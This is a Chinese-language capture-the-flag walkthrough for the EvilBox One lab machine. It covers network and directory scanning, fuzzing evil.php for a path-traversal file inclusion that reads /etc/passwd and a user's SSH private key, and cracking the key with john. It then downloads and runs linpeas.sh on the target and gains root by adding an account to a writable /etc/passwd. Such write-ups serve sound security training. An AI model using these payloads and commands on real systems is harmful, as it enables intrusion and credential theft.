EVILBOX ONE靶机复现

EVILBOX ONE靶机复现

准备工作

点我看靶机官方网页
首先将靶机和kali设置到一个网段内

信息搜集

首先对整个网段进行一个简单的扫描

nmap 10.0.2.0/24

发现靶机ip

这里在进行对其ip进行一个详细扫描

nmap -A -sV -p- 10.0.2.9

扫描完成

• 这里发现开放22,80端口

对其80端口进行访问

发现这是一个apsche的默认界面 这时利用扫描工具对其网址进行一个目录扫描

目录扫描

这里我运用的则是gobuster,和dirsearch两个工具进行的扫描

gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x html,php,txt --url http://10.0.2.9 

dirsearch -u http://10.0.2.9  

扫描发现有两个可疑目录robots.txt，secret分别对其进行访问

访问发现robots.txt目录并查看源码并无可用信息

对另外一个目录进行访问

• 这里发现则为一个空白的网页，这是猜测此目录下面还有一些东西，再次对其进行一个扫描
  
  这里我直接用的gobuster进行扫描

gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x html,php,txt --url http://10.0.2.9/secret/

扫描完成这里发现一个目录exil.php

对其进行访问发现仍然为一个空白页面

模糊测试

首先在url中写入

http://10.0.2.9/secret/evil.php?FUZZ=../../../../../../../../../../etc/passwd

wfuzz -w /usr/share/seclists/Discovery/Web-Content/common.txt -u http://10.0.2.9/secret/evil.php?FUZZ=../../../../../../../../../../etc/passwd --hh 0

这里扫描发现command
将其url中的FUZZ更改为扫描出来的command

发现可以访问到 /etc/passwd文件

查看源码

这里发现一个用户mowree
注：最下面的Jerry用户是我之前打的时候建立的

因上面信息搜集已知有ssh，此时尝试查看一下mowree用户的私钥
将url中的/etc/passwd更改为/home/mowree/.ssh/id_rsa

• 拿到私钥对其进行解密
  
  首先将私钥写入到一个文件中

touch id		# 创建文件id
vim id			# 将刚刚页面中的私钥复制到此文件中

然后利用ssh2john工具对此文件进行重定向,然后对其进行密码爆破

ssh2john id > tmp		# 将id文件重定向到tmp里
john tmp

密码爆破成功为unicorn

这是直接进行ssh登录
上面已知用户名为mowree

ssh mowree@10.0.2.9 -i id

这里发现报错了
此时需要修改一下id文件权限
此时权限为644
因为权限太高了需要将权限修改为600

修改完成再次登录发现登录成功

chmod 600 id			# 修改id权限为600
ssh mowree@10.0.2.9 -i id

提权

这里我尝试了一些的常见的提权方式，这里并没有发现可以提权的
这里我运用一款工具直接跑了一下查看一些常见的漏洞
工具名为linpeas.sh也可以自行到github查找

wget https://github.com/ankit-d68/linpeas/releases/download/linpeas.sh/ linpeas.sh
# 靶机中直接下载

输入命令

bash linpeas.sh 

扫描发现/etc/passwd存在漏洞

这里对/etc/passwd文件进行查看

发现读写权限

对其进行写入一个账户进行提权
首先在本地制作一个hash密码

openssl passwd -1 -salt Jerry Jerry		# Jerry 第一个则为用户名第二个则为密码

然后对其passwd1进行编写写入一个新的用户
将刚刚本地生成的密码直接复制到用户名后面
然后保存

直接切换用户登录刚刚写入的用户

提权成功

拿到flag